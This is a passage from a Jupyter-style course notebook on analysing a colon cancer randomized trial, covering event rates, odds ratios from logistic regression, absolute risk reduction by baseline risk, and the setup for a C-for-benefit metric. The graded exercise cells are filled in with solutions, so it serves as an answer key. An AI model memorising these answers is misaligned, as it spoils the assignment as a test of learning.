# You will be using different methods to evaluate the results of a [randomized control trial](https://en.wikipedia.org/wiki/Randomized_controlled_trial) (RCT).
#
# **You will learn:**
# - How to analyze data from a randomized control trial using both:
# - traditional statistical methods
# - and the more recent machine learning techniques
# - Interpreting Multivariate Models
# - Quantifying treatment effect
# - Calculating baseline risk
# - Calculating predicted risk reduction
# - Evaluating Treatment Effect Models
# - Comparing predicted and empirical risk reductions
# - Computing C-statistic-for-benefit
# - Interpreting ML models for Treatment Effect Estimation
# - Implement T-learner
# ### This assignment covers the folowing topics:
#
# - [1. Dataset](#1)
# - [1.1 Why RCT?](#1-1)
# - [1.2 Data Processing](#1-2)
# - [Exercise 1](#ex-01)
# - [Exercise 2](#ex-02)
# - [2. Modeling Treatment Effect](#2)
# - [2.1 Constant Treatment Effect](#2-1)
# - [Exercise 3](#ex-03)
# - [2.2 Absolute Risk Reduction](#2-2)
# - [Exercise 4](#ex-04)
# - [2.3 Model Limitations](#2-3)
# - [Exercise 5](#ex-05)
# - [Exercise 6](#ex-06)
# - [3. Evaluation Metric](#3)
# - [3.1 C-statistic-for-benefit](#3-1)
# - [Exercise 7](#ex-07)
# - [Exercise 8](#ex-08)
# - [4. Machine Learning Approaches](#4)
# - [4.1 T-Learner](#4-1)
# - [Exercise 9](#ex-09)
# - [Exercise 10](#ex-10)
# - [Exercise 11](#ex-11)
# ## Packages
#
# We'll first import all the packages that we need for this assignment.
#
#
# - `pandas` is what we'll use to manipulate our data
# - `numpy` is a library for mathematical and scientific operations
# - `matplotlib` is a plotting library
# - `sklearn` contains a lot of efficient tools for machine learning and statistical modeling
# - `random` allows us to generate random numbers in python
# - `lifelines` is an open-source library that implements c-statistic
# - `itertools` will help us with hyperparameters searching
#
# ## Import Packages
#
# Run the next cell to import all the necessary packages, dependencies and custom util functions.
# In[1]:
# Third-party scientific stack used throughout the assignment.
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sklearn
import random
import lifelines
import itertools
# Use a large default figure size for all plots.
plt.rcParams['figure.figsize'] = [10, 7]
# <a name="1"></a>
# ## 1 Dataset
# <a name="1-1"></a>
# ### 1.1 Why RCT?
#
# In this assignment, we'll be examining data from an RCT, measuring the effect of a particular drug combination on colon cancer. Specifically, we'll be looking the effect of [Levamisole](https://en.wikipedia.org/wiki/Levamisole) and [Fluorouracil](https://en.wikipedia.org/wiki/Fluorouracil) on patients who have had surgery to remove their colon cancer. After surgery, the curability of the patient depends on the remaining residual cancer. In this study, it was found that this particular drug combination had a clear beneficial effect, when compared with [Chemotherapy](https://en.wikipedia.org/wiki/Chemotherapy).
# <a name="1-2"></a>
# ### 1.2 Data Processing
# In this first section, we will load in the dataset and calculate basic statistics. Run the next cell to load the dataset. We also do some preprocessing to convert categorical features to one-hot representations.
# In[2]:
# Load the RCT results; the first CSV column holds the row index.
data = pd.read_csv("levamisole_data.csv", index_col=0)
# Let's look at our data to familiarize ourselves with the various fields.
# In[3]:
# Show the dimensions and the first rows to sanity-check the load.
print(f"Data Dimensions: {data.shape}")
data.head()
# Below is a description of all the fields (one-hot means a different field for each level):
# - `sex (binary): 1 if Male, 0 otherwise`
# - `age (int): age of patient at start of the study`
# - `obstruct (binary): obstruction of colon by tumor`
# - `perfor (binary): perforation of colon`
# - `adhere (binary): adherence to nearby organs`
# - `nodes (int): number of lymphnodes with detectable cancer`
# - `node4 (binary): more than 4 positive lymph nodes`
# - `outcome (binary): 1 if died within 5 years`
# - `TRTMT (binary): treated with levamisole + fluoroucil`
# - `differ (one-hot): differentiation of tumor`
# - `extent (one-hot): extent of local spread`
# In particular pay attention to the `TRTMT` and `outcome` columns. Our primary endpoint for our analysis will be the 5-year survival rate, which is captured in the `outcome` variable.
# <a name='ex-01'></a>
# ### Exercise 01
#
# Since this is an RCT, the treatment column is randomized. Let's warm up by finding what the treatment probability is.
#
# $$p_{treatment} = \frac{n_{treatment}}{n}$$
#
# - $n_{treatment}$ is the number of patients where `TRTMT = True`
# - $n$ is the total number of patients.
# In[9]:
# UNQ_C1 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def proportion_treated(df):
    """
    Compute proportion of trial participants who have been treated

    Args:
        df (dataframe): dataframe containing trial results. Column
                        'TRTMT' is 1 if patient was treated, 0 otherwise.

    Returns:
        result (float): proportion of patients who were treated
    """
    n_total = len(df.TRTMT)
    n_treated = sum(df.TRTMT == 1)
    return n_treated / n_total
# **Test Case**
# In[10]:
# Sanity-check proportion_treated on a tiny hand-built dataframe
# (3 of 4 rows treated, so the expected proportion is 0.75).
print("dataframe:\n")
example_df = pd.DataFrame(data =[[0, 0],
                                 [1, 1],
                                 [1, 1],
                                 [1, 1]], columns = ['outcome', 'TRTMT'])
print(example_df)
print("\n")
treated_proportion = proportion_treated(example_df)
print(f"Proportion of patient treated: computed {treated_proportion}, expected: 0.75")
# Next let's run it on our trial data.
# In[11]:
p = proportion_treated(data)
print(f"Proportion Treated: {p} ~ {int(p*100)}%")
# <a name='ex-02'></a>
# ### Exercise 02
#
# Next, we can get a preliminary sense of the results by computing the empirical 5-year death probability for the treated arm versus the control arm.
#
# The probability of dying for patients who received the treatment is:
#
# $$p_{\text{treatment, death}} = \frac{n_{\text{treatment,death}}}{n_{\text{treatment}}}$$
#
# - $n_{\text{treatment,death}}$ is the number of patients who received the treatment and died.
# - $n_{\text{treatment}}$ is the number of patients who received treatment.
#
# The probability of dying for patients in the control group (who did not received treatment) is:
#
# $$p_{\text{control, death}} = \frac{n_{\text{control,death}}}{n_{\text{control}}}$$
# - $n_{\text{control,death}}$ is the number of patients in the control group (did not receive the treatment) who died.
# - $n_{\text{control}}$ is the number of patients in the control group (did not receive treatment).
#
# In[12]:
# UNQ_C2 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def event_rate(df):
    '''
    Compute empirical rate of death within 5 years
    for treated and untreated groups.

    Args:
        df (dataframe): dataframe containing trial results.
                        'TRTMT' column is 1 if patient was treated, 0 otherwise.
                        'outcome' column is 1 if patient died within 5 years, 0 otherwise.

    Returns:
        treated_prob (float): empirical probability of death given treatment
        untreated_prob (float): empirical probability of death given control
    '''
    # Deaths among the treated, normalized by the number of treated patients.
    treated_prob = sum((df.TRTMT == 1) & (df.outcome == 1)) / sum(df.TRTMT == 1)
    # BUG FIX: the control rate must be normalized by the number of
    # UNTREATED patients. The original divided by sum(df.TRTMT), i.e. the
    # treated count, which is only correct when both arms happen to have
    # the same size (as in the notebook's 4-vs-4 test case).
    control_prob = sum((df.TRTMT == 0) & (df.outcome == 1)) / sum(df.TRTMT == 0)
    return treated_prob, control_prob
# **Test Case**
# In[13]:
# Sanity-check event_rate on a balanced toy dataframe: 4 treated patients
# with 2 deaths (rate 0.5) and 4 controls with 3 deaths (rate 0.75).
print("TEST CASE\ndataframe:\n")
example_df = pd.DataFrame(data =[[0, 1],
                                 [1, 1],
                                 [1, 1],
                                 [0, 1],
                                 [1, 0],
                                 [1, 0],
                                 [1, 0],
                                 [0, 0]], columns = ['outcome', 'TRTMT'])
#print("dataframe:\n")
print(example_df)
print("\n")
treated_prob, control_prob = event_rate(example_df)
print(f"Treated 5-year death rate, expected: 0.5, got: {treated_prob:.4f}")
print(f"Control 5-year death rate, expected: 0.75, got: {control_prob:.4f}")
# Now let's try the function on the real data.
# In[14]:
treated_prob, control_prob = event_rate(data)
print(f"Death rate for treated patients: {treated_prob:.4f} ~ {int(treated_prob*100)}%")
print(f"Death rate for untreated patients: {control_prob:.4f} ~ {int(control_prob*100)}%")
# On average, it seemed like treatment had a positive effect.
#
# #### Sanity checks
# It's important to compute these basic summary statistics as a sanity check for more complex models later on. If they strongly disagree with these robust summaries and there isn't a good reason, then there might be a bug.
# ### Train test split
#
# We'll now try to quantify the impact more precisely using statistical models. Before we get started fitting models to analyze the data, let's split it using the `train_test_split` function from `sklearn`. While a hold-out test set isn't required for logistic regression, it will be useful for comparing its performance to the ML models later on.
# In[15]:
# As usual, split into dev and test set
from sklearn.model_selection import train_test_split
# Seed both NumPy's and Python's RNG so the split is reproducible.
np.random.seed(18)
random.seed(1)
# Drop rows with missing values before modeling.
data = data.dropna(axis=0)
y = data.outcome
# notice we are dropping a column here. Now our total columns will be 1 less than before
X = data.drop('outcome', axis=1)
# Hold out 25% of the data as a test set for later model comparison.
X_dev, X_test, y_dev, y_test = train_test_split(X, y, test_size = 0.25, random_state=0)
# In[16]:
print(f"dev set shape: {X_dev.shape}")
print(f"test set shape: {X_test.shape}")
# <a name="2"></a>
# ## 2 Modeling Treatment Effect
# <a name="2-1"></a>
# ### 2.1 Constant Treatment Effect
#
# First, we will model the treatment effect using a standard logistic regression. If $x^{(i)}$ is the input vector, then this models the probability of death within 5 years as
# $$\sigma(\theta^T x^{(i)}) = \frac{1}{1 + exp(-\theta^T x^{(i)})},$$
#
# where $ \theta^T x^{(i)} = \sum_{j} \theta_j x^{(i)}_j$ is an inner product.
#
# For example, if we have three features, $TRTMT$, $AGE$, and $SEX$, then our probability of death would be written as:
#
# $$\sigma(\theta^T x^{(i)}) = \frac{1}{1 + exp(-\theta_{TRTMT} x^{(i)}_{TRTMT} - \theta_{AGE}x_{AGE}^{(i)} - \theta_{SEX}x^{(i)}_{SEX})}.$$
#
# Another way to look at logistic regresion is as a linear model for the "logit" function, or "log odds":
#
# $$logit(p) = \log \left(\frac{p}{1-p} \right)= \theta^T x^{(i)}$$
#
# - "Odds" is defined as the probability of an event divided by the probability of not having the event: $\frac{p}{1-p}$.
#
# - "Log odds", or "logit" function, is the natural log of the odds: $log \left(\frac{p}{1-p} \right)$
# In this example, $x^{(i)}_{TRTMT}$ is the treatment variable. Therefore, $\theta_{TRTMT}$ tells you what the effect of treatment is. If $\theta_{TRTMT}$ is negative, then having treatment reduces the log-odds of death, which means death is less likely than if you did not have treatment.
#
# Note that this assumes a constant relative treatment effect, since the impact of treatment does not depend on any other covariates.
#
# Typically, a randomized control trial (RCT) will seek to establish a negative $\theta_{TRTMT}$ (because the treatment is intended to reduce risk of death), which corresponds to an odds ratio of less than 1.
#
# An odds ratio of less than one implies the probability of death is less than the probability of surviving.
#
# $$ \frac{p}{1-p} < 1 \rightarrow p < 1-p$$
#
# Run the next cell to fit your logistic regression model.
#
# You can use the entire dev set (and do not need to reserve a separate validation set) because there is no need for hyperparameter tuning using a validation set.
# In[17]:
# Fit an L2-regularized logistic regression on the full dev set; no
# separate validation set is needed because no hyperparameters are tuned.
from sklearn.linear_model import LogisticRegression
lr = LogisticRegression(penalty='l2',solver='lbfgs', max_iter=10000).fit(X_dev, y_dev)
# ### Calculating the Odds ratio
#
# You are interested in finding the odds for treatment relative to the odds for the baseline.
#
# $$ OddsRatio = \frac{Odds_{treatment}}{Odds_{baseline}}$$
#
# where
# $$Odds_{treatment} = \frac{p_{treatment}}{1-p_{treatment}}$$
#
# and
#
# $$Odds_{baseline} = \frac{p_{baseline}}{1-p_{baseline}}$$
# If you look at the expression
#
# $$\log \left(\frac{p}{1-p} \right)= \theta^T x^{(i)} = \theta_{treatment} \times x_{treatment}^{(i)} + \theta_{age} \times x_{age}^{(i)} + \cdots$$
#
# Let's just let "$\theta \times x_{age}^{(i)} + \cdots$" stand for all the other thetas and feature variables except for the treatment $\theta_{treatment}^{(i)}$, and $x_{treatment}^{(i)}$ .
# #### Treatment
# To denote that the patient received treatment, we set $x_{treatment}^{(i)} = 1$. Which means the log odds for a treated patient are:
#
# $$ log( Odds_{treatment}) = \log \left(\frac{p_{treatment}}{1-p_{treatment}} \right) = \theta_{treatment} \times 1 + \theta_{age} \times x_{age}^{(i)} + \cdots$$
#
# To get odds from log odds, use exponentiation (raise to the power of e) to take the inverse of the natural log.
#
# $$Odds_{treatment} = e^{log( Odds_{treatment})} = \left(\frac{p_{treatment}}{1-p_{treatment}} \right) = e^{\theta_{treatment} \times 1 + \theta_{age} \times x_{age}^{(i)} + \cdots}$$
# #### Control (baseline)
#
# Similarly, when the patient has no treatment, this is denoted by $x_{treatment}^{(i)} = 0$. So the log odds for the untreated patient is:
#
# $$log(Odds_{baseline}) = \log \left(\frac{p_{baseline}}{1-p_{baseline}} \right) = \theta_{treatment} \times 0 + \theta_{age} \times x_{age}^{(i)} + \cdots$$
#
# $$ = 0 + \theta_{age} \times x_{age}^{(i)} + \cdots$$
#
# To get odds from log odds, use exponentiation (raise to the power of e) to take the inverse of the natural log.
#
# $$Odds_{baseline} = e^{log(Odds_{baseline})} = \left(\frac{p_{baseline}}{1-p_{baseline}} \right) = e^{0 + \theta_{age} \times x_{age}^{(i)} + \cdots}$$
#
# #### Odds Ratio
#
# The Odds ratio is:
#
# $$ OddsRatio = \frac{Odds_{treatment}}{Odds_{baseline}}$$
#
# Doing some substitution:
#
# $$ OddsRatio = \frac{e^{\theta_{treatment} \times 1 + \theta_{age} \times x_{age}^{(i)} + \cdots}}{e^{0 + \theta_{age} \times x_{age}^{(i)} + \cdots}}$$
#
# Notice that $e^{\theta_{age} \times x_{age}^{(i)} + \cdots}$ cancels on top and bottom, so that:
#
# $$ OddsRatio = \frac{e^{\theta_{treatment} \times 1}}{e^{0}}$$
#
# Since $e^{0} = 1$, This simplifies to:
#
# $$ OddsRatio = e^{\theta_{treatment}}$$
# <a name='ex-03'></a>
# ### Exercise 03: Extract the treatment effect
#
# Complete the `extract_treatment_effect` function to extract $\theta_{treatment}$ and then calculate the odds ratio of treatment from the logistic regression model.
# In[18]:
# UNQ_C3 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def extract_treatment_effect(lr, data):
    """
    Pull the treatment coefficient out of a fitted logistic regression
    and convert it into an odds ratio for treatment.

    Args:
        lr (model): fitted logistic regression; exposes .coef_ whose
            columns line up with data.columns
        data (dataframe): data the model was fit on (used only for
            its column names)

    Returns:
        theta_TRTMT (float): coefficient (log odds ratio) of the TRTMT feature
        TRTMT_OR (float): odds ratio for treatment, exp(theta_TRTMT)
    """
    # Map each feature name to its learned coefficient.
    coeffs = {data.columns[idx]: lr.coef_[0][idx]
              for idx in range(len(data.columns))}
    # The treatment coefficient is the log odds ratio of treatment.
    theta_TRTMT = coeffs['TRTMT']
    # Exponentiate to recover the odds ratio itself.
    TRTMT_OR = np.exp(theta_TRTMT)
    return theta_TRTMT, TRTMT_OR
# #### Test
# In[19]:
# Test extract_treatment_effect function
# NOTE(review): relies on notebook globals `lr` (fitted model) and `X_dev`
# defined in earlier cells.
theta_TRTMT, trtmt_OR = extract_treatment_effect(lr, X_dev)
print(f"Theta_TRTMT: {theta_TRTMT:.4f}")
print(f"Treatment Odds Ratio: {trtmt_OR:.4f}")
# ### Expected Output
#
# ```CPP
# Theta_TRTMT: -0.2885
# Treatment Odds Ratio: 0.7494
# ```
# Based on this model, it seems that the treatment has a beneficial effect.
# - The $\theta_{treatment} = -0.29$ is a negative value, meaning that it has the effect of reducing risk of death.
# - In the code above, the $OddsRatio$ is stored in the variable `TRTMT_OR`.
# - The $OddsRatio = 0.75$, which is less than 1.
#
#
# You can think of the $OddsRatio$ as a factor that is multiplied to the baseline odds $Odds_{baseline}$ in order to estimate the $Odds_{treatment}$. You can think about the Odds Ratio as a rate, converting between baseline odds and treatment odds.
#
# $$Odds_{treatment} = OddsRatio \times Odds_{baseline}$$
#
# In this case:
#
# $$Odds_{treatment} = 0.75 \times Odds_{baseline}$$
#
# So you can interpret this to mean that the treatment reduces the odds of death by $(1 - OddsRatio) = 1 - 0.75 = 0.25$, or about 25%.
#
# You will see how well this model fits the data in the next few sections.
# <a name="2-2"></a>
# ### 2.2 Absolute Risk Reduction
# <a name='ex-04'></a>
# ### Exercise 4: Calculate ARR
#
# A valuable quantity is the absolute risk reduction (ARR) of a treatment. If $p$ is the baseline probability of death, and $p_{treatment}$ is the probability of death if treated, then
# $$ARR = p_{baseline} - p_{treatment} $$
#
# In the case of logistic regression, here is how ARR can be computed:
# Recall that the Odds Ratio is defined as:
#
# $$OR = Odds_{treatment} / Odds_{baseline}$$
#
# where the "odds" is the probability of the event over the probability of not having the event, or $p/(1-p)$.
#
# $$Odds_{trtmt} = \frac{p_{treatment}}{1- p_{treatment}}$$
# and
# $$Odds_{baseline} = \frac{p_{baseline}}{1- p_{baseline}}$$
#
# In the function below, compute the predicted absolute risk reduction (ARR) given
# - the odds ratio for treatment "$OR$", and
# - the baseline risk of an individual $p_{baseline}$
#
# If you get stuck, try reviewing the level 1 hints by clicking on the cell "Hints Level 1". If you would like more help, please try viewing "Hints Level 2".
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints Level 1</b></font>
# </summary>
# <p>
# <ul>
# <li> Using the given $p$, compute the baseline odds of death.</li>
# <li> Then, use the Odds Ratio to convert that to odds of death given treatment.</li>
# <li> Finally, convert those odds back into a probability</li>
# </ul>
# </p>
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints Level 2</b></font>
# </summary>
# <p>
# <ul>
# <li> Solve for p_treatment starting with this expression: Odds_treatment = p_treatment / (1 - p_treatment). You may want to do this on a piece of paper.</li>
# </ul>
# </p>
# In[20]:
# UNQ_C4 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def OR_to_ARR(p, OR):
    """
    Convert a treatment odds ratio into an absolute risk reduction
    for an individual with a given baseline risk.

    Args:
        p (float): baseline probability of the event (without treatment)
        OR (float): odds ratio of treatment versus baseline

    Returns:
        float: absolute risk reduction, p_baseline - p_treatment
    """
    # Odds of the event without treatment.
    baseline_odds = p / (1 - p)
    # Treatment scales the baseline odds by the odds ratio.
    treatment_odds = OR * baseline_odds
    # Map the treated odds back into a probability.
    p_treatment = treatment_odds / (1 + treatment_odds)
    # Risk reduction is baseline risk minus treated risk.
    return p - p_treatment
# **Test Case**
# In[21]:
# NOTE(review): sanity checks of OR_to_ARR against hand-computed values.
print("TEST CASES")
test_p, test_OR = (0.75, 0.5)
print(f"baseline p: {test_p}, OR: {test_OR}")
print(f"Output: {OR_to_ARR(test_p, test_OR):.4f}, Expected: {0.15}\n")
test_p, test_OR = (0.04, 1.2)
print(f"baseline p: {test_p}, OR: {test_OR}")
print(f"Output: {OR_to_ARR(test_p, test_OR):.4f}, Expected: {-0.0076}")
# #### Visualize the treatment effect as baseline risk varies
#
# The logistic regression model assumes that treatment has a constant effect in terms of odds ratio and is independent of other covariates.
#
# However, this does not mean that absolute risk reduction is necessarily constant for any baseline risk $\hat{p}$. To illustrate this, we can plot absolute risk reduction as a function of baseline predicted risk $\hat{p}$.
#
# Run the next cell to see the relationship between ARR and baseline risk for the logistic regression model.
# In[22]:
# Sweep baseline risk over (0, 1) and plot the ARR implied by a constant
# treatment odds ratio (`trtmt_OR` comes from an earlier cell).
ps = np.arange(0.001, 0.999, 0.001)
diffs = [OR_to_ARR(p, trtmt_OR) for p in ps]
plt.plot(ps, diffs)
plt.title("Absolute Risk Reduction for Constant Treatment OR")
plt.xlabel('Baseline Risk')
plt.ylabel('Absolute Risk Reduction')
plt.show()
# Note that when viewed on an absolute scale, the treatment effect is not constant, despite the fact that you used a model with no interactions between the features (we didn't multiply two features together).
#
# As shown in the plot, when the baseline risk is either very low (close to zero) or very high (close to one), the Absolute Risk Reduction from treatment is fairly low. When the baseline risk is closer to 0.5 the ARR of treatment is higher (closer to 0.10).
#
# It is always important to remember that baseline risk has a natural effect on absolute risk reduction.
# <a name="2-3"></a>
# ### 2.3 Model Limitations
#
# We can now plot how closely the empirical (actual) risk reduction matches the risk reduction that is predicted by the logistic regression model.
#
# This is complicated by the fact that for each patient, we only observe one outcome (treatment or no treatment).
# - We can't give a patient treatment, then go back in time and measure an alternative scenario where the same patient did not receive the treatment.
# - Therefore, we will group patients into groups based on their baseline risk as predicted by the model, and then plot their empirical ARR within groups that have similar baseline risks.
# - The empirical ARR is the death rate of the untreated patients in that group minus the death rate of the treated patients in that group.
#
# $$ARR_{empirical} = p_{baseline} - p_{treatment}$$
# <a name='ex-05'></a>
# ### Exercise 5: Baseline Risk
# In the next cell, write a function to compute the baseline risk of each patient using the logistic regression model.
#
# The baseline risk is the model's predicted probability that the patient is predicted to die if they do not receive treatment.
#
# You will later use the baseline risk of each patient to organize patients into risk groups (that have similar baseline risks). This will allow you to calculate the ARR within each risk group.
#
# $$p_{baseline} = logisticRegression(Treatment = False, Age = age_{i}, Obstruct = obstruct_{i}, \cdots)$$
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints</b></font>
# </summary>
# <p>
# <ul>
# <li> A patient receives treatment if their feature x_treatment is True, and does not receive treatment when their x_treatment is False.</li>
# <li>For a patient who actually did receive treatment, you can ask the model to predict their risk without receiving treatment by setting the patient's x_treatment to False.</li>
# <li>The logistic regression predict_proba() function returns a 2D array, one row for each patient, and one column for each possible outcome (each class). In this case, the two outcomes are either no death (0), or death (1). To find out which column contains the probability for death, check the order of the classes by using lr.classes_ </li>
# </ul>
# </p>
# In[25]:
# UNQ_C5 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def base_risks(X, lr_model):
    """
    Compute each subject's baseline risk: the model's predicted
    probability of death assuming no treatment is given.

    Args:
        X (dataframe): trial data; the 'TRTMT' column is 1 if the
            subject received treatment, 0 otherwise
        lr_model (model): logistic regression model

    Returns:
        risks (np.array): predicted baseline risk per subject
    """
    # Work on a deep copy so the caller's dataframe keeps its TRTMT values.
    untreated = X.copy(deep=True)
    # Force the treatment indicator off: we want the risk each patient
    # would have *without* treatment, regardless of what they received.
    untreated.TRTMT = False
    # Column 1 of predict_proba holds the probability of the positive
    # class (death).
    return lr_model.predict_proba(untreated)[:, 1]
# **Test Case**
# In[26]:
# Build a two-row example: the same patient once with TRTMT = 1 and once
# with TRTMT = 0. base_risks should ignore the actual TRTMT value, so
# both rows must get the same baseline risk.
example_df = pd.DataFrame(columns = X_dev.columns)
example_df.loc[0, :] = X_dev.loc[X_dev.TRTMT == 1, :].iloc[0, :]
example_df.loc[1, :] = example_df.iloc[0, :]
# Flip only the treatment indicator on the duplicated row.
example_df.loc[1, 'TRTMT'] = 0
print("TEST CASE")
print(example_df)
print(example_df.loc[:, ['TRTMT']])
print('\n')
print("Base risks for both rows should be the same")
print(f"Baseline Risks: {base_risks(example_df.copy(deep=True), lr)}")
# #### Expected output
#
# ```CPP
# Base risks for both rows should be the same
# Baseline Risks: [0.43115868 0.43115868]
# ```
# <a name='ex-06'></a>
# ### Exercise 6: ARR by quantile
#
# Since the effect of treatment varies depending on the baseline risk, it makes more sense to group patients who have similar baseline risks, and then look at the outcomes of those who receive treatment versus those who do not, to estimate the absolute risk reduction (ARR).
#
# You'll now implement the `lr_ARR_quantile` function to plot empirical average ARR for each quantile of base risk.
# <details>
# <summary>
# <font size="3" color="darkgreen"><b>Hints</b></font>
# </summary>
# <p>
# <ul>
# <li>Use pandas.cut to define intervals of bins of equal size. For example, pd.cut(arr,5) uses the values in the list or array 'arr' and returns the intervals of 5 bins.</li>
# <li>Use pandas.DataFrame.groupby to group by a selected column of the dataframe. Then select the desired variable and apply an aggregator function. For example, df.groupby('col1')['col2'].sum() groups by column 1, and then calculates the sum of column 2 for each group. </li>
# </ul>
# </p>
#
# In[27]:
# UNQ_C6 (UNIQUE CELL IDENTIFIER, DO NOT EDIT)
def lr_ARR_quantile(X, y, lr):
    """
    Compute the empirical absolute risk reduction (ARR) within ten
    equal-width bins of model-predicted baseline risk.

    Args:
        X (dataframe): features, including the 'TRTMT' indicator
        y (array): true outcomes (1 = death, 0 = no death)
        lr (model): fitted logistic regression model

    Returns:
        arr_by_risk_group (pd.Series): empirical ARR per risk group,
            indexed by each group's mean baseline risk; named 'ARR'
    """
    # first make a deep copy of the features dataframe to calculate the base risks
    X = X.copy(deep=True)
    # Make another deep copy of the features dataframe to store baseline risk, risk_group, and y
    df = X.copy(deep=True)

    # Predicted risk of death for each patient assuming no treatment.
    baseline_risk = base_risks(df.copy(deep=True), lr)

    # Bin patients into 10 equal-width risk groups based on baseline risk.
    risk_groups = pd.cut(baseline_risk, 10)

    # Store the baseline risk, risk group, and outcome for each patient.
    df.loc[:, 'baseline_risk'] = baseline_risk
    df.loc[:, 'risk_group'] = risk_groups
    # BUG FIX: use the `y` argument, not the notebook-global `y_dev` —
    # the original silently ignored the outcomes passed in.
    df.loc[:, 'y'] = y

    # Split by actual treatment received.
    df_baseline = df[df.TRTMT == False]
    df_treatment = df[df.TRTMT == True]

    # Observed death rate per risk group in each arm.
    baseline_mean_by_risk_group = df_baseline.groupby('risk_group')['y'].mean()
    treatment_mean_by_risk_group = df_treatment.groupby('risk_group')['y'].mean()

    # Empirical ARR: untreated death rate minus treated death rate.
    arr_by_risk_group = baseline_mean_by_risk_group - treatment_mean_by_risk_group

    # Index each group by its average baseline risk, computed over all patients.
    arr_by_risk_group.index = df.groupby('risk_group')['baseline_risk'].mean()

    # Set the name of the Series to 'ARR'
    arr_by_risk_group.name = 'ARR'
    return arr_by_risk_group
# In[28]:
# Test
# NOTE(review): relies on notebook globals X_dev, y_dev and the fitted lr.
abs_risks = lr_ARR_quantile(X_dev, y_dev, lr)
# print the Series
print(abs_risks)
# just showing this as a Dataframe for easier viewing
display(pd.DataFrame(abs_risks))
# ##### Expected output
# ```CPP
# baseline_risk
# 0.231595 0.089744
# 0.314713 0.042857
# 0.386342 -0.014604
# 0.458883 0.122222
# 0.530568 0.142857
# 0.626937 -0.104072
# 0.693404 0.150000
# 0.777353 0.293706
# 0.836617 0.083333
# 0.918884 0.200000
# Name: ARR, dtype: float64
# ```
# Plot the ARR grouped by baseline risk
# In[29]:
# Scatter the empirical ARR per risk group against the smooth curve that a
# constant treatment odds ratio (trtmt_OR) predicts.
plt.scatter(abs_risks.index, abs_risks, label='empirical ARR')
plt.title("Empirical Absolute Risk Reduction vs. Baseline Risk")
plt.ylabel("Absolute Risk Reduction")
plt.xlabel("Baseline Risk Range")
# Evaluate the model-implied ARR over the observed range of baseline risks.
ps = np.arange(abs_risks.index[0]-0.05, abs_risks.index[-1]+0.05, 0.01)
diffs = [OR_to_ARR(p, trtmt_OR) for p in ps]
plt.plot(ps, diffs, label='predicted ARR')
plt.legend(loc='upper right')
plt.show()
# In the plot, the empirical absolute risk reduction is shown as circles, whereas the predicted risk reduction from the logistic regression model is given by the solid line.
#
# If ARR depended only on baseline risk, then if we plotted actual (empirical) ARR grouped by baseline risk, then it would follow the model's predictions closely (the dots would be near the line in most cases).
#
# However, you can see that the empirical absolute risk reduction (shown as circles) does not match the predicted risk reduction from the logistic regression model (given by the solid line).
#
# This may indicate that ARR may depend on more than simply the baseline risk.
# <a name="3"></a>
# ## 3 Evaluation Metric
# <a name="3-1"></a>
# ### 3.1 C-statistic-for-benefit (C-for-benefit)
#
# You'll now use a measure to evaluate the discriminative power of your models for predicting ARR. Ideally, you could use something like the regular Concordance index (also called C-statistic) from Course 2. Proceeding by analogy, you'd like to estimate something like:
#
# $$P(A \text{ has higher predicted ARR than } B| A \text{ experienced a greater risk reduction than } B).$$
#
# #### The ideal data cannot be observed
#
# The fundamental problem is that for each person, you can only observe either their treatment outcome or their baseline outcome.
# - The patient either receives the treatment, or does not receive the treatment. You can't go back in time to have the same patient undergo treatment and then not have treatment.
# - This means that you can't determine what their actual risk reduction was.
# #### Estimate the treated/untreated patient using a pair of patients
#
# What you will do instead is match people across treatment and control arms based on predicted ARR.
# - Now, in each pair, you'll observe both outcomes, so you'll have an estimate of the true treatment effect.
# - In the pair of patients (A,B),
# - Patient A does not receive the treatment (control arm)
# - Patient B receives the treatment.
# - Think of the pair of patients as a substitute for the ideal data that has the same exact patient in both the treatment and control group.
# #### The C-for-benefit
#
# $$P(\text{$P_1$ has a predicted ARR greater than $P_2$} | \text{$P_1$ experiences greater risk reduction than $P_2$}),$$
#
# - Pair 1 consists of two patients (A,B), where A is from the control arm (no treatment) and B received treatment.
# - Pair 2 is another pair of two patients (A,B), where A is untreated and B is treated.
#
# The observed benefit (risk reduction) for each pair is:
# - 1 if the untreated person A dies and the treated person B survives (treatment helps).
# - -1 if the untreated person A survives and the treated person B dies (treatment harms)
# - 0 otherwise (treatment has no effect, because both patients in the pair live, or both die).
# #### Details for calculating C-for-benefit
#
# The c-for-benefit gives you a way to evaluate the ability of models to discriminate between patient profiles which are likely to experience greater benefit from treatment.
# - If you are better able to predict how likely a treatment can improve a patient's outcome, you can help the doctor and patient make a more informed decision when deciding whether to undergo treatment, considering the possible side-effects and other risks associated with treatment.
#
# Please complete the implementation of the C-statistic-for-benefit below.
#
# The code to create the pairs is given to you.
# ```CPP
# obs_benefit_dict = {
# (0, 0): 0,
# (0, 1): -1,
# (1, 0): 1,
# (1, 1): 0,
# }
# ```
# Here is the interpretation of this dictionary for a pair of patients, (A,B), where A is from the control arm (no treatment) and B received treatment:
# - When patient A does not die, and neither does patient B, `(0, 0)`, the observed benefit of treatment is 0.
# - When patient A does not die, but patient B does die, `(0, 1)`, the observed benefit is -1 (the treatment was harmful).
# - When patient A dies, but patient B does not die, `(1, 0)`, the observed benefit is 1 (the treatment helped)
# - When patient A dies and patient B dies, `(1, 1)`, the observed benefit of treatment is 0.
#
# Each patient in the pair is represented by a tuple `(ARR, y)`.
# - Index 0 contains the predicted ARR, which is the predicted benefit from treatment.
# - Index 1 contains the actual patient outcome: 0 for no death, 1 for death.
#
# So a pair of patients is represented as a tuple containing two tuples:
#
# For example, Pair_1 is `( (ARR_1_A, y_1_A),(ARR_1_B, y_1_B))`, and the data may look like:
# `( (0.60, 0),(0.40, 1))`.
# - This means that patient A (from the control arm) has a predicted benefit of 0.60 and does not die.
# - Patient B (who received treatment) has a predicted benefit of 0.40 and dies.
# <a name='ex-07'></a>
# ### Exercise 7: Calculate c for benefit score
# In `c_for_benefit_score`, you will compute the C-for-benefit given the matched pairs.
#
# $$\text{c for benefit score} = \frac{concordant + 0.5 \times risk\_ties}{permissible}$$
# <details>
# <summary>
